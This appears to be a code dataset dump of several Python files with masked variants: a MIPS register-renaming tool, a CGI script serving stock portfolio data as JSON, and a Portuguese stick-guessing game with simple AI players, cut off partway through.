S2: R1', 'row1 column2'],\n ['row2 column1', 'row2 column2'],\n ['row3 column1', 'row3 column2']\n]\ntable = AsciiTable(table_data)\n\n\ndef getDependenceStr(ins1, ins2, reg):\n return f\"{ins1} -> {ins2}: {reg}\"\n\n\ndef getInstructionStr(ins, reg1, reg2, reg3):\n return f\"{ins} {reg1} {reg2} {reg3}\"\n\n\ndef getInstructionArr(ins):\n return ins.split(' ')\n\n\ndef validateInput(str):\n if str.strip() == '':\n return True\n\n return len(str.split()) == 4\n\n\ndef getInstructionFromUser(insNum):\n ins = input(f\"S{insNum}: \")\n\n while not validateInput(ins):\n print(\"The value instruction you entered is invalid. Please try again\")\n print(\"Remember the instruction must be in the format:\"\n \"ins Reg1 Reg2 Reg3 \")\n ins = input(f\"S{insNum}: \")\n return ins\n\n\ndef findDependencies(instructions):\n dependencies = {'waw': findWAWs(instructions),\n 'war': findWARs(instructions),\n 'trueDeps': findTrueDependencies(instructions)}\n return dependencies\n\n\ndef findWAWs(instructions):\n waws = {}\n insDict = {}\n i = 1\n\n for ins in instructions:\n insDict[f'S{i}'] = ins\n i += 1\n\n workingIns = copy.deepcopy(insDict)\n\n for (key, value) in insDict.items():\n insParts = value.split()\n\n del workingIns[key]\n\n for (key2, otherIns) in workingIns.items():\n if insParts[1] == otherIns.split()[1]:\n waws[f'{key} -> {key2}'] = insParts[1]\n break # Find only the first occurance of a waw\n return waws\n\n\ndef findWARs(ins):\n wars = {}\n insDict = {}\n i = 1\n\n for ins in instructions:\n insDict[f'S{i}'] = ins\n i += 1\n\n workingIns = copy.deepcopy(insDict)\n\n for (key, value) in insDict.items():\n insParts = value.split()\n\n del workingIns[key]\n\n for (key2, otherIns) in workingIns.items():\n if insParts[2] == otherIns.split()[1]:\n wars[f'{key} -> {key2}'] = insParts[2]\n if insParts[3] == otherIns.split()[1]:\n wars[f'{key} -> {key2}'] = insParts[3]\n return wars\n\n\ndef findTrueDependencies(ins):\n trueDeps = {}\n for i in range(len(ins)-1, -1, -1):\n ins1 = ins[i].split()\n for k in range(2, len(ins1), 1):\n checkReg = ins1[k]\n for s in range(i-1, -1, -1):\n ins2 = ins[s].split()\n if checkReg == ins2[1]:\n trueDeps[f'S{s+1} -> S{i+1}'] = checkReg\n break\n return trueDeps\n\n\ndef resolveDependencies(instructions, dependencies):\n waws = dependencies['waw']\n wars = dependencies['war']\n trueDeps = dependencies['trueDeps']\n insDict = {}\n i = 1\n\n for ins in instructions:\n insDict[f'S{i}'] = ins\n i += 1\n\n tNum = 0\n\n # Resolve WAWs\n for (dependence, reg) in waws.items():\n depParts = dependence.split()\n insParts = insDict[depParts[0]].split()\n\n try:\n # Check true dependence\n trueDepsExist, trueDep = checkTrueDep(dependence, trueDeps, reg)\n if trueDepsExist:\n trueDepParts = trueDep.split()\n ins1 = insDict[trueDepParts[0]].split()\n ins2 = insDict[trueDepParts[2]].split()\n\n ins1ChangeIndex = ins1.index(reg)\n ins2ChangeIndex = [i for i, x in enumerate(ins2) if x == reg]\n\n ins1[ins1ChangeIndex] = f'T{tNum}'\n for index in ins2ChangeIndex:\n if index != 1:\n ins2[index] = f'T{tNum}'\n\n insDict[trueDepParts[0]] = ' '.join(ins1)\n insDict[trueDepParts[2]] = ' '.join(ins2)\n else:\n changeIndex = insParts.index(reg)\n insParts[changeIndex] = f'T{tNum}'\n\n insDict[depParts[0]] = ' '.join(insParts)\n tNum += 1\n except ValueError:\n pass\n\n # Resolve WARs\n for (dependence, reg) in wars.items():\n depParts = dependence.split()\n insParts = insDict[depParts[0]].split()\n\n try:\n changeIndex = insParts.index(reg)\n insParts[changeIndex] = f'T{tNum}'\n\n insDict[depParts[0]] = ' '.join(insParts)\n tNum += 1\n except ValueError:\n pass\n\n return insDict\n\n\ndef checkTrueDep(falseDep, trueDeps, reg):\n # for waws\n depArr = falseDep.split()\n for (trueDep, reg2) in trueDeps.items():\n trueDepArr = trueDep.split()\n if depArr[0] == trueDepArr[0] and reg == reg2:\n return (True, trueDep)\n return (None, None)\n\n\ndef parseDepDictToTableData(dependenciesDict):\n tableData = [\n ['WAW', 'WAR', 'True']\n ]\n waws = dependenciesDict['waw']\n wars = dependenciesDict['war']\n trueDeps = dependenciesDict['trueDeps']\n\n wawKeys = list(waws.keys())\n warKeys = list(wars.keys())\n trueDepKeys = list(trueDeps.keys())\n\n maxLength = max([len(waws), len(wars), len(trueDeps)])\n for i in range(0, maxLength):\n data = [f'{wawKeys[i]} -> {waws[wawKeys[i]]}'\n if i < len(wawKeys) else '', # Add WAW Dependencies\n\n f'{warKeys[i]} -> {wars[warKeys[i]]}'\n if i < len(warKeys) else '', # Add WAR Dependencies\n\n f'{trueDepKeys[i]} -> {trueDeps[trueDepKeys[i]]}'\n if i < len(trueDepKeys) else ''] # Add True Dependencies\n\n tableData.append(data)\n return tableData\n\n\nif __name__ == '__main__':\n numIns = 0\n maxNumIns = 5\n stop = False\n instructions = []\n\n print(\"Enter up to 5 MIPs instructions below. When you're done simply\"\n \"press enter without typing in any input\")\n print(\"Instructions must be in the format: ins Reg1 Reg2 Reg3\")\n print(\"i.e. add R1 R2 R3\")\n while numIns < maxNumIns and not stop:\n ins = getInstructionFromUser(numIns+1)\n if ins != '':\n instructions.append(ins)\n numIns += 1\n else:\n stop = True\n\n # Genarate the table data need to show instructions given\n table_data = [\n ['Given Instructions'],\n ]\n\n i = 1\n for ins in instructions:\n table_data.append([f'S{i} - ' + ins])\n i += 1\n\n table = AsciiTable(table_data)\n print(\"Here are the instructions provided:\")\n print('\\n' + table.table + '\\n')\n input(\"Press Enter find any existing false dependencies\\n\")\n dependenciesDict = findDependencies(instructions)\n table = AsciiTable(parseDepDictToTableData(dependenciesDict))\n print('\\n' + table.table + '\\n')\n input(\"\\nPress Enter to begin renaming registers\")\n resolvedInstructions = resolveDependencies(instructions, dependenciesDict)\n resolvedInstructionsArr = []\n for (key, value) in resolvedInstructions.items():\n resolvedInstructionsArr.append(f'{key} - {value}')\n resolvedTableData = [\n ['Resolved Instructions']\n ]\n\n for ins in resolvedInstructionsArr:\n resolvedTableData.append([ins])\n table = AsciiTable(resolvedTableData)\n print(table.table + '\\n')\n input('Press Enter to continue')\n print('DONE!\\n')\n", "step-ids": [ 7, 10, 11, 13, 16 ] }
[ 7, 10, 11, 13, 16 ]
#!/usr/bin/python import operator import cgi, sys, LINK_HEADERS import simplejson as json from datetime import datetime from dateutil import tz from decimal import * sys.path.insert(0, str(LINK_HEADERS.DAO_LINK)) from transaction_dao import Transaction_dao from user_portfolio_dao import User_portfolio_dao from user_stock_value_dao import User_stock_value_dao from company_dao import Company_dao from history_dao import History_dao from sector_info_dao import Sector_info_dao print "Content-Type: text/html\r\n\r\n" form = cgi.FieldStorage() if form.getvalue("username") != None: username = form.getvalue("username") if form.getvalue("filter") != None: portfolio_filter = form.getvalue("filter") if portfolio_filter == '1': filter_flag = "ALL" elif portfolio_filter == '2': filter_flag = "ALGOS" elif portfolio_filter == '0': filter_flag = "USER" else: filter_flag = portfolio_filter tdao = Transaction_dao() u2 = User_stock_value_dao() u1 = User_portfolio_dao() cdao = Company_dao() hdao = History_dao() data={} if filter_flag == "ALL": t = hdao.select_all(username) l = tdao.get_user_stock_list(username) elif filter_flag == "ALGOS": t = hdao.select_all_algo_trades(username) l = tdao.get_all_algo_stock_list(username) elif filter_flag == "USER": t = hdao.select_all_user_trades(username) l = tdao.get_only_user_stock_list(username) else: t = hdao.select_algo_trades(username, filter_flag) l = tdao.get_algo_stock_list(username, filter_flag) # HISTORY if t: data['transactions']={} for i in range(len(t)): data['transactions'][i]={} #start date formatting from_zone = tz.tzutc() to_zone = tz.tzlocal() date_time = t[i].get_trans_date() date_time = date_time.strftime('%Y-%m-%d %H:%M:%S') date_time = datetime.strptime(date_time, '%Y-%m-%d %H:%M:%S') date_time = date_time.replace(tzinfo=from_zone) updated_date_time = date_time.astimezone(to_zone) updated_date_time = updated_date_time.strftime('%Y-%m-%d %H:%M:%S') #end date formatting data['transactions'][i]['trans_date'] = updated_date_time data['transactions'][i]['trans_type'] = t[i].get_trans_type() # try: # data['transactions'][i]['name']=cdao.get_company_model(t[i].get_stock()).get_name() # except: # data['transactions'][i]['name']="" data['transactions'][i]['stock'] = t[i].get_stock() data['transactions'][i]['price'] = t[i].get_price() data['transactions'][i]['total_price'] = t[i].get_total_price() data['transactions'][i]['volume'] = t[i].get_volume() else: data['transactions']={} data['transactions'][0]={} data['transactions'][0]['trans_date'] = "" data['transactions'][0]['trans_type'] = "" data['transactions'][0]['name']="" data['transactions'][0]['stock'] = "" data['transactions'][0]['price'] = "" data['transactions'][0]['total_price'] = "" data['transactions'][0]['volume'] = "" # OWNED STOCKS sector_dao=Sector_info_dao() data['sector_volume']={} if l: data['owned_stocks']={} #total_stock_value = 0 # for i in range(len(l)): # c = cdao.get_company_model(l[i]) c = cdao.get_list_of_company_models(l) if c: for i in range(len(c)): try: o = tdao.get_owned_stock_model(username, c[i].get_symbol(), c[i].get_ask()) except: continue data['owned_stocks'][i]={} data['owned_stocks'][i]['name']=c[i].get_name() data['owned_stocks'][i]['stock'] = c[i].get_symbol() data['owned_stocks'][i]['current_shares'] = o.get_volume() data['owned_stocks'][i]['current_price'] = c[i].get_ask() data['owned_stocks'][i]['total_worth'] = o.get_total_worth() data['owned_stocks'][i]['profit'] = o.get_profit() #total_stock_value = Decimal(total_stock_value) + Decimal(o.get_total_worth()) #--------Code for chart - sector_volume:--- volume=o.get_volume() symbol=c[i].get_symbol() try: sector=sector_dao.get_sector_by_symbol(symbol) if(sector.strip()==''):sector="Other" except: sector="Other" if(sector not in data['sector_volume']): data['sector_volume'][sector]=volume; else: data['sector_volume'][sector]+=volume; #----------end of code for chart-------- else: data['owned_stocks']={} data['owned_stocks'][0]={} data['owned_stocks'][0]['name'] ="" data['owned_stocks'][0]['stock'] = "" data['owned_stocks'][0]['current_shares'] = "" data['owned_stocks'][0]['current_price'] = "" data['owned_stocks'][0]['total_worth'] = "" data['owned_stocks'][0]['profit'] = "" # PORTFOLIO INFORMATION #---------------------Code for Chart Generation----------------------------- sectors=[] volume=[] sorted_volume=sorted(data['sector_volume'].items(),key=operator.itemgetter(1)) length=len(sorted_volume); #Insertion Sort for i in range(length): j=i while(j>0 and sorted_volume[j][1]>sorted_volume[j-1][1]): temp=sorted_volume[j-1] sorted_volume[j-1]=sorted_volume[j] sorted_volume[j]=temp j=j-1 MAX=35 for i in range(length): if(i>=MAX):break; if(sorted_volume[i][0]=='Other'):continue sectors.append(sorted_volume[i][0]) volume.append(sorted_volume[i][1]) data['chart_axis']=sectors; data['chart_data']=volume; #--------------------------------end of code for chart--------------------# up = u1.get_user_portfolio_model(username) usv = u2.get_user_stock_value_model(username) data['users']={} if up: data['users']['total_portfolio'] = up.get_total_portfolio() data['users']['total_deposited'] = up.get_total_deposited() data['users']['available_funds'] = up.get_available_funds() else: data['users']['total_portfolio'] = 0 data['users']['total_deposited'] = 0 data['users']['available_funds'] = 0 if usv: data['users']['total_stock_values'] = usv.get_total_stock_values() data['users']['profit'] = usv.get_profit() else: data['users']['total_stock_values'] = 0 data['users']['profit'] = 0 #----------------------------------code owned Stocks chart-----------------------------# owned_stocks=data['owned_stocks'] owned_stocks_graph_data={} sorted_owned_stocks_chart_axis=[] sorted_owned_stocks_chart_value=[] for i in owned_stocks: owned_stocks_graph_data[owned_stocks[i]['stock']]=owned_stocks[i]['total_worth'] length=len(owned_stocks_graph_data); sorted_data=sorted(owned_stocks_graph_data.items(),key=operator.itemgetter(1)) for i in range(length-1,-1,-1): if(length-i>MAX):break sorted_owned_stocks_chart_axis.append(sorted_data[i][0]) sorted_owned_stocks_chart_value.append(sorted_data[i][1]) data['owned_stocks_chart_axis']=sorted_owned_stocks_chart_axis; data['owned_stocks_chart_value']=sorted_owned_stocks_chart_value; json_result = json.dumps(data) print json_result
normal
{ "blob_id": "4264cba9a6c39219d21bd21d4b21009bacd1db38", "index": 61, "step-1": "#!/usr/bin/python\n\nimport operator\nimport cgi, sys, LINK_HEADERS\nimport simplejson as json\nfrom datetime import datetime\nfrom dateutil import tz\nfrom decimal import *\nsys.path.insert(0, str(LINK_HEADERS.DAO_LINK))\nfrom transaction_dao import Transaction_dao\nfrom user_portfolio_dao import User_portfolio_dao\nfrom user_stock_value_dao import User_stock_value_dao\nfrom company_dao import Company_dao\nfrom history_dao import History_dao\nfrom sector_info_dao import Sector_info_dao\nprint \"Content-Type: text/html\\r\\n\\r\\n\"\n\nform = cgi.FieldStorage()\n\nif form.getvalue(\"username\") != None:\n username = form.getvalue(\"username\")\nif form.getvalue(\"filter\") != None:\n portfolio_filter = form.getvalue(\"filter\")\n\n if portfolio_filter == '1':\n filter_flag = \"ALL\"\n elif portfolio_filter == '2':\n filter_flag = \"ALGOS\"\n elif portfolio_filter == '0':\n filter_flag = \"USER\"\n else:\n filter_flag = portfolio_filter\n \ntdao = Transaction_dao()\nu2 = User_stock_value_dao()\nu1 = User_portfolio_dao()\ncdao = Company_dao()\nhdao = History_dao()\n\ndata={}\n\nif filter_flag == \"ALL\":\n t = hdao.select_all(username)\n l = tdao.get_user_stock_list(username)\nelif filter_flag == \"ALGOS\":\n t = hdao.select_all_algo_trades(username)\n l = tdao.get_all_algo_stock_list(username)\nelif filter_flag == \"USER\":\n t = hdao.select_all_user_trades(username)\n l = tdao.get_only_user_stock_list(username)\nelse:\n t = hdao.select_algo_trades(username, filter_flag)\n l = tdao.get_algo_stock_list(username, filter_flag)\n\n\n# HISTORY\nif t:\n data['transactions']={}\n \n for i in range(len(t)):\n data['transactions'][i]={}\n\t\n\t #start date formatting\n from_zone = tz.tzutc()\n to_zone = tz.tzlocal()\n date_time = t[i].get_trans_date()\n date_time = date_time.strftime('%Y-%m-%d %H:%M:%S')\n date_time = datetime.strptime(date_time, '%Y-%m-%d %H:%M:%S')\t\n date_time = date_time.replace(tzinfo=from_zone)\n updated_date_time = date_time.astimezone(to_zone)\n updated_date_time = updated_date_time.strftime('%Y-%m-%d %H:%M:%S')\n\t #end date formatting\t\n\n data['transactions'][i]['trans_date'] = updated_date_time\n data['transactions'][i]['trans_type'] = t[i].get_trans_type()\n\n# try:\n# data['transactions'][i]['name']=cdao.get_company_model(t[i].get_stock()).get_name()\n# except:\n# data['transactions'][i]['name']=\"\"\n \n data['transactions'][i]['stock'] = t[i].get_stock()\n data['transactions'][i]['price'] = t[i].get_price()\n data['transactions'][i]['total_price'] = t[i].get_total_price()\n data['transactions'][i]['volume'] = t[i].get_volume()\nelse:\n data['transactions']={}\n data['transactions'][0]={}\n data['transactions'][0]['trans_date'] = \"\"\n data['transactions'][0]['trans_type'] = \"\"\n data['transactions'][0]['name']=\"\"\n data['transactions'][0]['stock'] = \"\"\n data['transactions'][0]['price'] = \"\"\n data['transactions'][0]['total_price'] = \"\"\n data['transactions'][0]['volume'] = \"\"\n \n\n\n# OWNED STOCKS\nsector_dao=Sector_info_dao()\ndata['sector_volume']={}\nif l:\n \n data['owned_stocks']={}\n #total_stock_value = 0\n \n# for i in range(len(l)):\n# c = cdao.get_company_model(l[i])\n \n c = cdao.get_list_of_company_models(l)\n if c:\n for i in range(len(c)):\n try:\n o = tdao.get_owned_stock_model(username, c[i].get_symbol(), c[i].get_ask()) \n except:\n continue\n \n data['owned_stocks'][i]={}\n data['owned_stocks'][i]['name']=c[i].get_name()\n data['owned_stocks'][i]['stock'] = c[i].get_symbol()\n data['owned_stocks'][i]['current_shares'] = o.get_volume()\n data['owned_stocks'][i]['current_price'] = c[i].get_ask()\n data['owned_stocks'][i]['total_worth'] = o.get_total_worth()\n data['owned_stocks'][i]['profit'] = o.get_profit()\n #total_stock_value = Decimal(total_stock_value) + Decimal(o.get_total_worth())\n\n #--------Code for chart - sector_volume:---\n volume=o.get_volume()\n symbol=c[i].get_symbol()\n try:\n sector=sector_dao.get_sector_by_symbol(symbol)\n if(sector.strip()==''):sector=\"Other\"\n except:\n sector=\"Other\"\n\n if(sector not in data['sector_volume']):\n data['sector_volume'][sector]=volume;\n else:\n data['sector_volume'][sector]+=volume;\n #----------end of code for chart--------\n \nelse:\n data['owned_stocks']={}\n data['owned_stocks'][0]={}\n data['owned_stocks'][0]['name'] =\"\"\n data['owned_stocks'][0]['stock'] = \"\"\n data['owned_stocks'][0]['current_shares'] = \"\"\n data['owned_stocks'][0]['current_price'] = \"\"\n data['owned_stocks'][0]['total_worth'] = \"\"\n data['owned_stocks'][0]['profit'] = \"\"\n\n# PORTFOLIO INFORMATION\n#---------------------Code for Chart Generation-----------------------------\nsectors=[]\nvolume=[]\n\nsorted_volume=sorted(data['sector_volume'].items(),key=operator.itemgetter(1))\nlength=len(sorted_volume);\n\n#Insertion Sort\nfor i in range(length):\n j=i\n while(j>0 and sorted_volume[j][1]>sorted_volume[j-1][1]):\n temp=sorted_volume[j-1]\n sorted_volume[j-1]=sorted_volume[j]\n sorted_volume[j]=temp\n j=j-1\n\nMAX=35\nfor i in range(length):\n if(i>=MAX):break;\n if(sorted_volume[i][0]=='Other'):continue\n sectors.append(sorted_volume[i][0])\n volume.append(sorted_volume[i][1])\n\n\ndata['chart_axis']=sectors;\ndata['chart_data']=volume;\n#--------------------------------end of code for chart--------------------#\n\nup = u1.get_user_portfolio_model(username)\nusv = u2.get_user_stock_value_model(username)\ndata['users']={}\n\nif up:\n data['users']['total_portfolio'] = up.get_total_portfolio()\n data['users']['total_deposited'] = up.get_total_deposited()\n data['users']['available_funds'] = up.get_available_funds()\nelse:\n data['users']['total_portfolio'] = 0\n data['users']['total_deposited'] = 0\n data['users']['available_funds'] = 0 \n\nif usv:\n data['users']['total_stock_values'] = usv.get_total_stock_values()\n data['users']['profit'] = usv.get_profit() \nelse:\n data['users']['total_stock_values'] = 0\n data['users']['profit'] = 0\n \n\n\n\n\n#----------------------------------code owned Stocks chart-----------------------------#\n\nowned_stocks=data['owned_stocks']\nowned_stocks_graph_data={}\n\nsorted_owned_stocks_chart_axis=[]\nsorted_owned_stocks_chart_value=[]\n\nfor i in owned_stocks:\n owned_stocks_graph_data[owned_stocks[i]['stock']]=owned_stocks[i]['total_worth']\n\nlength=len(owned_stocks_graph_data);\nsorted_data=sorted(owned_stocks_graph_data.items(),key=operator.itemgetter(1))\n\n\nfor i in range(length-1,-1,-1):\n if(length-i>MAX):break\n sorted_owned_stocks_chart_axis.append(sorted_data[i][0])\n sorted_owned_stocks_chart_value.append(sorted_data[i][1])\n\ndata['owned_stocks_chart_axis']=sorted_owned_stocks_chart_axis;\ndata['owned_stocks_chart_value']=sorted_owned_stocks_chart_value;\n\njson_result = json.dumps(data)\nprint json_result\n\n \n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from random import randint class Game(object): def __init__(self, players): if len(players) < 2: raise ValueError('Number of player must be at least 2') self.play_order = players self.player_data = {} for player in self.play_order: # [total, on_hand, hunch] self.player_data[player] = [3, None, None, False] self.player_data['IA 1'][3] = True self.player_data['IA 2'][3] = True def game_loop(self): while not self.won(): hunches = [] for player, data in self.player_data.items(): print("Jogador: {}".format(player)) if (data[3]): data[1] = randint(0, data[0]) else: data[1] = randint(0, data[0]) print("Palitos na mão: {}\n".format(data[1])) for player in self.play_order: print("Jogador: {}".format(player)) if (self.player_data[player][3]): hunch = self.hunch(player, hunches) self.player_data[player][2] = hunch else: # random hunch hunch = randint(0, self.max()) while hunch in hunches: hunch = randint(0, self.max()) self.player_data[player][2] = hunch # human hunch # hunch = int(input("Qual seu palpite?\n")) # while (hunch in hunches): # hunch = int(input("Palpite invalido. \nQual seu palpite?\n")) # self.player_data[player][2] = hunch print("Palpite: {}\n".format(hunch)) hunches.append(hunch) winner = self.round_won() print("Soma dos palitos: {}".format(self.sum())) if winner: print("{} ganhou a rodada\n".format(winner)) self.player_data[winner][0] -= 1 self.play_order.remove(winner) self.play_order.insert(0, winner) else: print("Ninguém ganhou :(\n") print(("-" * 10) + " nova rodada " + ("-" * 10)) self.reset() for player, data in self.player_data.items(): if data[0] == 0: print("{} ganhou o jogo".format(player)) return player def hunch(self, player, hunches): # seu palpite inicial eh pelo menos a sua quantidade de palitos hunch = self.player_data[player][1] rand = 0 sticks = [] stik = 0 # calcula os palitos dos jogadores anteriores atraves dos palpites destes for other_player in self.play_order[0:self.play_order.index(player)]: # media dos proximos jogadores average = self.average(self.play_order[self.play_order.index(other_player):len(self.play_order) - 1]) # calcula os palitos estimados do jogador stik = self.player_data[other_player][2] - average[0] # remove os palitos anteriores que ja estao considerados for stick in sticks: stik -= stick sticks.append(stik) # erros de arredondamento, adiciona a randomicidade esperada rand += average[1] hunch += stik # chama average com os jogadores remanescente average = self.average(self.play_order[self.play_order.index(player):len(self.play_order) - 1]) # caso o numero seja quebrado (0.5) adiciona-se 1 a randomicidade rand += average[1] # valor estimado, com metade da randomicidade hunch += average[0] + rand // 2 # caso o chute ja tenha sido usado, chutar o mais proximo possivel # começando pelo lado mais proximo da media if (self.average(self.play_order)[0] > hunch): i = 0 while (hunch in hunches) or (hunch > self.max()) or (hunch < 0): i += 1 if i % 2 == 0: hunch -= i else: hunch += i else: i = 0 while (hunch in hunches) or (hunch > self.max()) or (hunch < 0): i += 1 if i % 2 == 0: hunch += i else: hunch -= i # retorna seu chute return hunch def average(self, remaining_players): result = 0 for player in remaining_players: result += self.player_data[player][0] # entrega a media do resultado, e se houve sobra entrega 1 no segundo argumento return [result // 2, result % 2] def max(self): total = 0 for player in self.play_order: total += self.player_data[player][0] return total def reset(self): for player, data in self.player_data.items(): data[1] = None data[2] = None def round_won(self): sum = self.sum() for player, data in self.player_data.items(): if data[2] == sum: return player return None def won(self): for player, data in self.player_data.items(): if data[0] == 0: return True return False def sum(self): sum = 0 for player, data in self.player_data.items(): sum += data[1] return sum if __name__ == '__main__': players = ['Rand A', 'Rand B', 'Rand C', 'IA 1', 'IA 2'] wins = {} n = 1 for player in players: wins[player] = 0 for i in range(0, n): game = Game(players) winner = game.game_loop() if winner: wins[winner] += 1 print("\nRelatório:") for player, win_count in wins.items(): print("{} ganhou {} vezes".format(player, win_count))
normal
{ "blob_id": "52f3000514fd39083daa6316d551f1685c7cea23", "index": 6792, "step-1": "<mask token>\n\n\nclass Game(object):\n <mask token>\n\n def game_loop(self):\n while not self.won():\n hunches = []\n for player, data in self.player_data.items():\n print('Jogador: {}'.format(player))\n if data[3]:\n data[1] = randint(0, data[0])\n else:\n data[1] = randint(0, data[0])\n print('Palitos na mão: {}\\n'.format(data[1]))\n for player in self.play_order:\n print('Jogador: {}'.format(player))\n if self.player_data[player][3]:\n hunch = self.hunch(player, hunches)\n self.player_data[player][2] = hunch\n else:\n hunch = randint(0, self.max())\n while hunch in hunches:\n hunch = randint(0, self.max())\n self.player_data[player][2] = hunch\n print('Palpite: {}\\n'.format(hunch))\n hunches.append(hunch)\n winner = self.round_won()\n print('Soma dos palitos: {}'.format(self.sum()))\n if winner:\n print('{} ganhou a rodada\\n'.format(winner))\n self.player_data[winner][0] -= 1\n self.play_order.remove(winner)\n self.play_order.insert(0, winner)\n else:\n print('Ninguém ganhou :(\\n')\n print('-' * 10 + ' nova rodada ' + '-' * 10)\n self.reset()\n for player, data in self.player_data.items():\n if data[0] == 0:\n print('{} ganhou o jogo'.format(player))\n return player\n <mask token>\n\n def average(self, remaining_players):\n result = 0\n for player in remaining_players:\n result += self.player_data[player][0]\n return [result // 2, result % 2]\n\n def max(self):\n total = 0\n for player in self.play_order:\n total += self.player_data[player][0]\n return total\n\n def reset(self):\n for player, data in self.player_data.items():\n data[1] = None\n data[2] = None\n\n def round_won(self):\n sum = self.sum()\n for player, data in self.player_data.items():\n if data[2] == sum:\n return player\n return None\n\n def won(self):\n for player, data in self.player_data.items():\n if data[0] == 0:\n return True\n return False\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Game(object):\n\n def __init__(self, players):\n if len(players) < 2:\n raise ValueError('Number of player must be at least 2')\n self.play_order = players\n self.player_data = {}\n for player in self.play_order:\n self.player_data[player] = [3, None, None, False]\n self.player_data['IA 1'][3] = True\n self.player_data['IA 2'][3] = True\n\n def game_loop(self):\n while not self.won():\n hunches = []\n for player, data in self.player_data.items():\n print('Jogador: {}'.format(player))\n if data[3]:\n data[1] = randint(0, data[0])\n else:\n data[1] = randint(0, data[0])\n print('Palitos na mão: {}\\n'.format(data[1]))\n for player in self.play_order:\n print('Jogador: {}'.format(player))\n if self.player_data[player][3]:\n hunch = self.hunch(player, hunches)\n self.player_data[player][2] = hunch\n else:\n hunch = randint(0, self.max())\n while hunch in hunches:\n hunch = randint(0, self.max())\n self.player_data[player][2] = hunch\n print('Palpite: {}\\n'.format(hunch))\n hunches.append(hunch)\n winner = self.round_won()\n print('Soma dos palitos: {}'.format(self.sum()))\n if winner:\n print('{} ganhou a rodada\\n'.format(winner))\n self.player_data[winner][0] -= 1\n self.play_order.remove(winner)\n self.play_order.insert(0, winner)\n else:\n print('Ninguém ganhou :(\\n')\n print('-' * 10 + ' nova rodada ' + '-' * 10)\n self.reset()\n for player, data in self.player_data.items():\n if data[0] == 0:\n print('{} ganhou o jogo'.format(player))\n return player\n\n def hunch(self, player, hunches):\n hunch = self.player_data[player][1]\n rand = 0\n sticks = []\n stik = 0\n for other_player in self.play_order[0:self.play_order.index(player)]:\n average = self.average(self.play_order[self.play_order.index(\n other_player):len(self.play_order) - 1])\n stik = self.player_data[other_player][2] - average[0]\n for stick in sticks:\n stik -= stick\n sticks.append(stik)\n rand += average[1]\n hunch += stik\n average = self.average(self.play_order[self.play_order.index(player\n ):len(self.play_order) - 1])\n rand += average[1]\n hunch += average[0] + rand // 2\n if self.average(self.play_order)[0] > hunch:\n i = 0\n while hunch in hunches or hunch > self.max() or hunch < 0:\n i += 1\n if i % 2 == 0:\n hunch -= i\n else:\n hunch += i\n else:\n i = 0\n while hunch in hunches or hunch > self.max() or hunch < 0:\n i += 1\n if i % 2 == 0:\n hunch += i\n else:\n hunch -= i\n return hunch\n\n def average(self, remaining_players):\n result = 0\n for player in remaining_players:\n result += self.player_data[player][0]\n return [result // 2, result % 2]\n\n def max(self):\n total = 0\n for player in self.play_order:\n total += self.player_data[player][0]\n return total\n\n def reset(self):\n for player, data in self.player_data.items():\n data[1] = None\n data[2] = None\n\n def round_won(self):\n sum = self.sum()\n for player, data in self.player_data.items():\n if data[2] == sum:\n return player\n return None\n\n def won(self):\n for player, data in self.player_data.items():\n if data[0] == 0:\n return True\n return False\n\n def sum(self):\n sum = 0\n for player, data in self.player_data.items():\n sum += data[1]\n return sum\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Game(object):\n\n def __init__(self, players):\n if len(players) < 2:\n raise ValueError('Number of player must be at least 2')\n self.play_order = players\n self.player_data = {}\n for player in self.play_order:\n self.player_data[player] = [3, None, None, False]\n self.player_data['IA 1'][3] = True\n self.player_data['IA 2'][3] = True\n\n def game_loop(self):\n while not self.won():\n hunches = []\n for player, data in self.player_data.items():\n print('Jogador: {}'.format(player))\n if data[3]:\n data[1] = randint(0, data[0])\n else:\n data[1] = randint(0, data[0])\n print('Palitos na mão: {}\\n'.format(data[1]))\n for player in self.play_order:\n print('Jogador: {}'.format(player))\n if self.player_data[player][3]:\n hunch = self.hunch(player, hunches)\n self.player_data[player][2] = hunch\n else:\n hunch = randint(0, self.max())\n while hunch in hunches:\n hunch = randint(0, self.max())\n self.player_data[player][2] = hunch\n print('Palpite: {}\\n'.format(hunch))\n hunches.append(hunch)\n winner = self.round_won()\n print('Soma dos palitos: {}'.format(self.sum()))\n if winner:\n print('{} ganhou a rodada\\n'.format(winner))\n self.player_data[winner][0] -= 1\n self.play_order.remove(winner)\n self.play_order.insert(0, winner)\n else:\n print('Ninguém ganhou :(\\n')\n print('-' * 10 + ' nova rodada ' + '-' * 10)\n self.reset()\n for player, data in self.player_data.items():\n if data[0] == 0:\n print('{} ganhou o jogo'.format(player))\n return player\n\n def hunch(self, player, hunches):\n hunch = self.player_data[player][1]\n rand = 0\n sticks = []\n stik = 0\n for other_player in self.play_order[0:self.play_order.index(player)]:\n average = self.average(self.play_order[self.play_order.index(\n other_player):len(self.play_order) - 1])\n stik = self.player_data[other_player][2] - average[0]\n for stick in sticks:\n stik -= stick\n sticks.append(stik)\n rand += average[1]\n hunch += stik\n average = self.average(self.play_order[self.play_order.index(player\n ):len(self.play_order) - 1])\n rand += average[1]\n hunch += average[0] + rand // 2\n if self.average(self.play_order)[0] > hunch:\n i = 0\n while hunch in hunches or hunch > self.max() or hunch < 0:\n i += 1\n if i % 2 == 0:\n hunch -= i\n else:\n hunch += i\n else:\n i = 0\n while hunch in hunches or hunch > self.max() or hunch < 0:\n i += 1\n if i % 2 == 0:\n hunch += i\n else:\n hunch -= i\n return hunch\n\n def average(self, remaining_players):\n result = 0\n for player in remaining_players:\n result += self.player_data[player][0]\n return [result // 2, result % 2]\n\n def max(self):\n total = 0\n for player in self.play_order:\n total += self.player_data[player][0]\n return total\n\n def reset(self):\n for player, data in self.player_data.items():\n data[1] = None\n data[2] = None\n\n def round_won(self):\n sum = self.sum()\n for player, data in self.player_data.items():\n if data[2] == sum:\n return player\n return None\n\n def won(self):\n for player, data in self.player_data.items():\n if data[0] == 0:\n return True\n return False\n\n def sum(self):\n sum = 0\n for player, data in self.player_data.items():\n sum += data[1]\n return sum\n\n\nif __name__ == '__main__':\n players = ['Rand A', 'Rand B', 'Rand C', 'IA 1', 'IA 2']\n wins = {}\n n = 1\n for player in players:\n wins[player] = 0\n for i in range(0, n):\n game = Game(players)\n winner = game.game_loop()\n if winner:\n wins[winner] += 1\n print('\\nRelatório:')\n for player, win_count in wins.items():\n print('{} ganhou {} vezes'.format(player, 